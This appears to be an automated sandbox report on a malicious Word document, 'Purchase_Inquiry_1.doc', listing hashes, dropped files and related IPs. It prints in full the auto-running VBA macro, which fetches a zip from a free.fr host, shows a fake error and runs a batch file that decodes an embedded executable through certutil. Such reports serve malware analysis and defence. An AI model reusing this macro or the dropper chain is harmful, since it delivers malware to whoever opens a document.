                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            PROXADFRsplppc.elfGet hashmaliciousUnknownBrowse
                            • 78.198.33.245
                            nklsh4.elfGet hashmaliciousUnknownBrowse
                            • 88.188.210.4
                            splarm7.elfGet hashmaliciousUnknownBrowse
                            • 78.246.139.129
                            nabx86.elfGet hashmaliciousUnknownBrowse
                            • 88.122.45.125
                            nklarm7.elfGet hashmaliciousUnknownBrowse
                            • 78.215.107.251
                            jklppc.elfGet hashmaliciousUnknownBrowse
                            • 88.173.191.176
                            jklarm5.elfGet hashmaliciousUnknownBrowse
                            • 78.244.124.191
                            jklarm7.elfGet hashmaliciousUnknownBrowse
                            • 88.165.176.171
                            mips.elfGet hashmaliciousUnknownBrowse
                            • 82.67.172.0
                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                            • 88.189.112.253

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\3546255\1741130958.zip

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):95084
                            Entropy (8bit):7.9910562897314605
                            Encrypted:true
                            SSDEEP:1536:0QW7rM56cylgl/x/zWEGysB7Yk0etudvjah0vtJ2ZDt2COYtPjT2OGBboZvu9U:0QW7rM8cyCz1oBD0egdW0v2ZBXO4P2oN
                            MD5:39F32727AE03493E3B5ED9A882D1B48A
                            SHA1:496EE5227A858ABDE2A8358EDA1B2A37730A7E6A
                            SHA-256:4B8A741A38ECDD6E604345DEED59C8E7F13C5979C1BC7E909B513F80EF83A890
                            SHA-512:362A7DFB3C7D12F31FC23EBFD40C9B5DD65BDA70C16C96FC54238787B26A0888D7F2518CE39DFF1C169A0325B757E8F36A0C17317C49A5B3B33CBB7FCD685FA0
                            Malicious:false
                            Reputation:low
                            Preview:PK........g]YZ...7.r..t.......Ppo.bat.}[s..{W..X/.)U'N ..p.Z........:/..anN .._.4.,.!.+Y....=......U....).........u......V.......i....|0~Z<....G|.-................OvS.....v..^w..Z|.?..{...C"...AHH......k.4%1....O..N.d...U..I...i.>.{Z...*]:.....w.1..C..~U>..G.......la..C.TD....6!..b...m..K.T....L....b..t?G2ey...:.i+.$~..M.n&.....N...M........`..Z.....cw....p...5.L-.....S.......yKW.}......I.vI>.a&..j,Fn}VV...d...@..E_..kQ....>b..$%..&B...PI...)h.......u...Z.k....@.`x&..@..A$...LQ/d..i..Ab1M`U..........:.....6..M...(&....&.n..m.?.O......d`....C...w..w....R.Y..=.C}.`....<J.........l...H;d.......m..n .....r.0.... 1A...........Z..r).M.,...{...&@g .....=..E.Y.wt.S5.L.9..K.?...8/...*..PB..K...x..<..L.p....r.e....{.....'/z..>A...2.u.F..w...}..6zN.......tWO.6olT.|.~?......e....iX.\.f.....~..j....\....1uk..CC.A......$wZk....|..8.......z.Z..MH......m6.j..w...7.t....~........;.....aZK.a6N#.. .(.q..=..$Y:.X..ow2.F.eE.J...S.Bw..i...<...Ja.2G.D..o+.

                            C:\3546255\Ppo.bat

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:DOS batch file, ASCII text, with very long lines (821), with CRLF line terminators
                            Category:dropped
                            Size (bytes):261492
                            Entropy (8bit):5.090735612404722
                            Encrypted:false
                            SSDEEP:6144:IcgHPD6A9e2WvzTA7R6EteCwHNLVI589agH:tChHWN0M
                            MD5:0FD197505E772316F09B32E339138183
                            SHA1:A73FFDFC68AC6BA74E7BA99FB80DEC36160A03A2
                            SHA-256:2E09CBDD78C3B2C3F21A16FC59E3CF1071C353E78AB50797EF9AA980AF023DE6
                            SHA-512:6993604010A28A51C2A62B4D66EB3BC5C9549C0C9B9A4E0FEF091980E8CF888494831E9871DBCDCEB033004C072B093A31CA2073F51F26FA0D8E2B887F460D41
                            Malicious:true
                            Reputation:low
                            Preview:@echo off..setlocal enableextensions enabledelayedexpansion..set TEMPBASE64=%TEMP%\i19ag96bvk.txt..set TEMPEXE=%TEMP%\i19ag96bvk.exe..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAASdlfUAAAAAAAAAAOAAIgELATAAAN4CAAAIAAAAAAAAXv0CAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABAAwAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAj9AgBTAAAAAAADAFAFAAAAAAAAAAAAAAAAAAAAAAAAACADAAwAAADs/AIAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAZN0CAAAgAAAA3gIAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAFAFAAAAAAMAAAYAAADgAgAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACADAAACAAAA5gIAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABA/QIAAAAAAEgAAAACAAUAsKgBADxUAQABAAAAMAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwB3AAAA > %TEMPBASE64%..echo AAAAAB2NAgAAASXQVAQABCgBAAAKgA8AAAR+DwA

                            C:\5564642\1741130958.zip

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):95084
                            Entropy (8bit):7.9910562897314605
                            Encrypted:true
                            SSDEEP:1536:0QW7rM56cylgl/x/zWEGysB7Yk0etudvjah0vtJ2ZDt2COYtPjT2OGBboZvu9U:0QW7rM8cyCz1oBD0egdW0v2ZBXO4P2oN
                            MD5:39F32727AE03493E3B5ED9A882D1B48A
                            SHA1:496EE5227A858ABDE2A8358EDA1B2A37730A7E6A
                            SHA-256:4B8A741A38ECDD6E604345DEED59C8E7F13C5979C1BC7E909B513F80EF83A890
                            SHA-512:362A7DFB3C7D12F31FC23EBFD40C9B5DD65BDA70C16C96FC54238787B26A0888D7F2518CE39DFF1C169A0325B757E8F36A0C17317C49A5B3B33CBB7FCD685FA0
                            Malicious:true
                            Reputation:low
                            Preview:PK........g]YZ...7.r..t.......Ppo.bat.}[s..{W..X/.)U'N ..p.Z........:/..anN .._.4.,.!.+Y....=......U....).........u......V.......i....|0~Z<....G|.-................OvS.....v..^w..Z|.?..{...C"...AHH......k.4%1....O..N.d...U..I...i.>.{Z...*]:.....w.1..C..~U>..G.......la..C.TD....6!..b...m..K.T....L....b..t?G2ey...:.i+.$~..M.n&.....N...M........`..Z.....cw....p...5.L-.....S.......yKW.}......I.vI>.a&..j,Fn}VV...d...@..E_..kQ....>b..$%..&B...PI...)h.......u...Z.k....@.`x&..@..A$...LQ/d..i..Ab1M`U..........:.....6..M...(&....&.n..m.?.O......d`....C...w..w....R.Y..=.C}.`....<J.........l...H;d.......m..n .....r.0.... 1A...........Z..r).M.,...{...&@g .....=..E.Y.wt.S5.L.9..K.?...8/...*..PB..K...x..<..L.p....r.e....{.....'/z..>A...2.u.F..w...}..6zN.......tWO.6olT.|.~?......e....iX.\.f.....~..j....\....1uk..CC.A......$wZk....|..8.......z.Z..MH......m6.j..w...7.t....~........;.....aZK.a6N#.. .(.q..=..$Y:.X..ow2.F.eE.J...S.Bw..i...<...Ja.2G.D..o+.

                            C:\5564642\Ppo.bat

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:DOS batch file, ASCII text, with very long lines (821), with CRLF line terminators
                            Category:dropped
                            Size (bytes):261492
                            Entropy (8bit):5.090735612404722
                            Encrypted:false
                            SSDEEP:6144:IcgHPD6A9e2WvzTA7R6EteCwHNLVI589agH:tChHWN0M
                            MD5:0FD197505E772316F09B32E339138183
                            SHA1:A73FFDFC68AC6BA74E7BA99FB80DEC36160A03A2
                            SHA-256:2E09CBDD78C3B2C3F21A16FC59E3CF1071C353E78AB50797EF9AA980AF023DE6
                            SHA-512:6993604010A28A51C2A62B4D66EB3BC5C9549C0C9B9A4E0FEF091980E8CF888494831E9871DBCDCEB033004C072B093A31CA2073F51F26FA0D8E2B887F460D41
                            Malicious:true
                            Reputation:low
                            Preview:@echo off..setlocal enableextensions enabledelayedexpansion..set TEMPBASE64=%TEMP%\i19ag96bvk.txt..set TEMPEXE=%TEMP%\i19ag96bvk.exe..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAASdlfUAAAAAAAAAAOAAIgELATAAAN4CAAAIAAAAAAAAXv0CAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABAAwAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAj9AgBTAAAAAAADAFAFAAAAAAAAAAAAAAAAAAAAAAAAACADAAwAAADs/AIAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAZN0CAAAgAAAA3gIAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAFAFAAAAAAMAAAYAAADgAgAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACADAAACAAAA5gIAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABA/QIAAAAAAEgAAAACAAUAsKgBADxUAQABAAAAMAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwB3AAAA > %TEMPBASE64%..echo AAAAAB2NAgAAASXQVAQABCgBAAAKgA8AAAR+DwA

                            C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe

                            Download File
                            Process:C:\Windows\SysWOW64\certutil.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):112800
                            Entropy (8bit):5.615863694373274
                            Encrypted:false
                            SSDEEP:3072:z+AIE6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXB0A0srT8bU:zGE6iee4xUZA9Pt6Mf8noNM3MWQ/s17i
                            MD5:D47A213067F10E02D83A325926E98509
                            SHA1:B87F47688C383DC59C8F9170C11101626C472B22
                            SHA-256:FA5FA37C1008B41C890048B0FAC4F81CFC024F21DC7D76485CC276CF0729CF0C
                            SHA-512:798D91FD338DACAFF118DB74FDA8578D78D588969CD72C1F3451A9A992093202D1B63ECA6F6F8847849EF74310902473C3B6F4F321BEB36678E0304D597111AC
                            Malicious:true
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`.....................................S.......P.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B................@.......H...........<T......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........

                            C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt

                            Download File
                            Process:C:\Windows\SysWOW64\cmd.exe
                            File Type:ASCII text, with very long lines (801), with CRLF line terminators
                            Category:modified
                            Size (bytes):275784
                            Entropy (8bit):5.0634311208907565
                            Encrypted:false
                            SSDEEP:6144:sco91DkeTvWgGcG2qVSpR6ElmYO5xFVuDKxG0l:Xb21H96xEG
                            MD5:54CD951E2141FC195D3E64821221A6EC
                            SHA1:A9CE0126BA12AEFF02EE8F9A5CFB00F27EE1F23D
                            SHA-256:66EC90DDCAE0DA893211ADBF2AAD7DB61838429AA497D2E00265D807848343AD
                            SHA-512:17680B39B7008E409068FFFB83355423EE2DDA0BA0E83FAED8A97E216962970AC3E482B539E93DFC091EB9382AF9C8F9ACAF6521641FB1DB1883A363081F249D
                            Malicious:false
                            Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAASdlfUAAAAAAAAAAOAAIgELATAAAN4CAAAIAAAAAAAAXv0CAAAgAAAAAAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABAAwAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAj9AgBTAAAAAAADAFAFAAAAAAAAAAAAAAAAAAAAAAAAACADAAwAAADs/AIAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAZN0CAAAgAAAA3gIAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAFAFAAAAAAMAAAYAAADgAgAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAACADAAACAAAA5gIAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABA/QIAAAAAAEgAAAACAAUAsKgBADxUAQABAAAAMAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwB3AAAA ..AAAAAB2NAgAAASXQVAQABCgBAAAKgA8AAAR+DwAABHMCAAAKgBAAAAQfXY0CAAABgA4AAAR+DgAABB8iHyKdfg4AAAQfXB9cnX4OAAAEHh9inX4OAAAEHwwfZp1+DgAABB8KH26dfg4AAAQfDR9ynX4OAAAEHwkfdJ0qABMwAgAXAAAAAQAAEQISACgDAAAGLAIGK

                            C:\Users\user\AppData\Local\Temp\~DF2981D90B16E60B81.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\Desktop\~$rchase_Inquiry_1.doc

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.5890785841313306
                            Encrypted:false
                            SSDEEP:3:C1ClXLlAT7x1AqQEmdlfllzi+eaaaH/C:blYYqQrW+Faaa
                            MD5:3C6AAA28041FB1D7A3BE861A4BC12A3E
                            SHA1:F173DAE9680716659C1FE7E5290412F063D1940A
                            SHA-256:3DE10B4FC3C9A3F17C54992D0AA76FF1E8EF9523B045944084CAC38757381F60
                            SHA-512:D4E8774564451010E2CB2D9A3CD483DED6EAE4730A291D168C89229D99C012B92D42E791731DA3E1AB07604ABC64BF4F8C9381D852C7A33780F44A9BF9200446
                            Malicious:false
                            Preview:.user...............................................e.n.g.i.n.e.e.r.......,.z`....H.Z..a.i..............................................z`.!o.}..j......n..=.i

                            \Device\Null

                            Download File
                            Process:C:\Windows\SysWOW64\certutil.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):208
                            Entropy (8bit):5.207588895793622
                            Encrypted:false
                            SSDEEP:3:qOYFXSQuRo4Z2xKj5XLMxNG4qX6XtXFg337jsV4sD3GqRF8jxd1ELzKVJ6XtXFgy:q3EoFi+xTqXia3cmYgxILaia3cmYhP
                            MD5:D5D6B64267913051294188E962EA1DC8
                            SHA1:FB7BF4DBADBE0389C272045930FE7DD20A1A56C2
                            SHA-256:B15B064779C9F842FFFBB86F4D9E10C06ED1198FDD8D752604640C9DEFBB194F
                            SHA-512:37CCA692A3D4EEEA8ACC06CB33061AEE8180160A49042C0376945AF4E66BA3E19F4DCAC1A3C8C496D939F75F309161F9ED4E0A54B3ABE843EDB7A9BD5DBB0759
                            Malicious:false
                            Preview:Input Length = 275784..EncodeToFile returned The file exists. 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)..CertUtil: -decode command FAILED: 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)..CertUtil: The file exists...

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: USER, Template: Normal.dotm, Last Saved By: USER, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 22:00, Create Time/Date: Thu Jan 2 11:13:00 2025, Last Saved Time/Date: Mon Mar 3 20:04:00 2025, Number of Pages: 1, Number of Words: 20, Number of Characters: 118, Security: 0
                            Entropy (8bit):3.9394413598612568
                            TrID:
                            • Microsoft Word document (32009/1) 54.23%
                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                            File name:Purchase_Inquiry_1.doc
                            File size:46'592 bytes
                            MD5:a9bddd4272a1020b5b36be097f8a80f8
                            SHA1:5b7368f5a8b040dfdccfd6421f5d1e823aceb65a
                            SHA256:25dceeb01ea833d9dfd54c933f7c0f019079e86db670af3e2171c31e730dbe77
                            SHA512:6e6faa21546f913be6260428b3c30d0a3c46ee9131baf2e8c1e4f966233c3fe4473e6417f01697cab79d1378c88dabecff8594171a3e51e5c8595c815c02c026
                            SSDEEP:384:vxT7+46+r8E8iSwvxjk+tAD6WzWK8NrOerMKGMReH6EA0jGvYP/qtT3/BlRb:v4OAqxw+tRof8NmvyZQU
                            TLSH:B223C701B2D6DE27F66652321DD7C6EAB239BC0A6F51C31B32407F2EBC75A308A11759
                            File Content Preview:........................>.......................1...........4...............0..................................................................................................................................................................................

                            File Icon

                            Icon Hash:35e1cc889a8a8599

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "Purchase_Inquiry_1.doc"

                            Indicators
                            Has Summary Info:
                            Application Name:Microsoft Office Word
                            Encrypted Document:False
                            Contains Word Document Stream:True
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Summary
                            Code Page:1252
                            Title:
                            Subject:
                            Author:USER
                            Keywords:
                            Comments:
                            Template:Normal.dotm
                            Last Saved By:USER
                            Revion Number:9
                            Total Edit Time:1320
                            Create Time:2025-01-02 11:13:00
                            Last Saved Time:2025-03-03 20:04:00
                            Number of Pages:1
                            Number of Words:20
                            Number of Characters:118
                            Creating Application:Microsoft Office Word
                            Security:0
                            Document Summary
                            Document Code Page:1252
                            Number of Lines:1
                            Number of Paragraphs:1
                            Thumbnail Scaling Desired:False
                            Company:
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:1048576

                            Streams with VBA

                            VBA File Name: ThisDocument.cls, Stream Size: 7677
                            General
                            Stream Path:Macros/VBA/ThisDocument
                            VBA File Name:ThisDocument.cls
                            Stream Size:7677
                            Data ASCII:. . . . . . . . . . . . . . . r . . . . . . . . . . . . . . . . . . . . { J ( . . . . . . . . . . . . . . . . . . . < . . . = . @ d U R S > D ) . $ p . . . . . . . . . . . . . . . . . . . . 4 . k H F l . . . . . . . . . . . . . . . . . . . . . . x . . . . 4 . k H F l = . @ d U . . . . M E . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . . . . . S " . . . . S . . . . . S " . . . . ) . . . . . . ) L . . . . . . > " . . . . . L . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 16 01 00 04 00 01 00 00 c6 11 00 00 e4 00 00 00 72 02 00 00 9b 12 00 00 a9 12 00 00 dd 19 00 00 00 00 00 00 01 00 00 00 7b 4a f8 28 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 ba 9d b3 3d 86 ca 07 40 93 64 bf 97 cc cc 55 83 52 98 bc ce c4 53 3e 44 ac fd 29 05 93 cc 24 70 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub downloadFile(url As String, fileOutPath As String)
    Dim WinHttpReq As Object, oStream As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", url, False
    WinHttpReq.Send
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile fileOutPath, 2
        oStream.Close
    End If
End Sub
Sub Unzip(dirr As String)
    Dim sh As Shell32.Shell
    Dim sf As Shell32.Folder
    Dim df As Shell32.Folder
    Set sh = New Shell32.Shell
    Set df = sh.NameSpace(dirr)
    Set sf = sh.NameSpace(dirr & "1741130958.zip")
    df.CopyHere sf.Items
End Sub
Function GenerateRandomValue() As String
    Dim randomNum As String
    Randomize
    randomNum = Trim(Str(Int((10000000 - 11 + 1) * Rnd + lowerbound)))
    GenerateRandomValue = randomNum
End Function
Sub DownloadUnzipAndRun()
    Dim url As String
    Dim savePath As String
    Dim ShellApp As Object
    Dim rundomnum As String
    Dim dirr As String
    url = "http://portalsphere.free.fr/phUploader/uploads/1741130958.zip"
    rundomnum = GenerateRandomValue
    dirr = "C:\" & rundomnum & "\"
    MkDir dirr
    savePath = dirr & "1741130958.zip"
    downloadFile url, savePath
    Unzip dirr
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
        MsgBox "File Error loading,please sender.."
    objShell.Run dirr & "\Ppo.bat"
    Set WinHttpReq = Nothing
    Set oStream = Nothing
    Set ShellApp = Nothing
    Set objShell = Nothing
End Sub
Sub Document_Open()
DownloadUnzipAndRun
End Sub
Sub AutoOpen()
DownloadUnzipAndRun
End Sub

                            Streams

                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.235956365095031
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.24428749081187057
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . . .
                            Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:4096
                            Entropy:0.4613560948312974
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U S E R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                            Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                            Stream Path: 1Table, File Type: data, Stream Size: 7725
                            General
                            Stream Path:1Table
                            CLSID:
                            File Type:data
                            Stream Size:7725
                            Entropy:5.795578933395778
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                            Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                            Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 1189, 1st item "?\350\275\346`\332\276\327\232\355\245\226\2257\260\037Y_I\260n\212]v\001\370\001\251H\262%\224Xe)\0064\332\023\376k\222yq\035\251", Stream Size: 4096
                            General
                            Stream Path:Data
                            CLSID:
                            File Type:dBase III DBT, version number 0, next free block index 1189, 1st item "?\350\275\346`\332\276\327\232\355\245\226\2257\260\037Y_I\260n\212]v\001\370\001\251H\262%\224Xe)\0064\332\023\376k\222yq\035\251"
                            Stream Size:4096
                            Entropy:4.390246451733229
                            Base64 Encoded:False
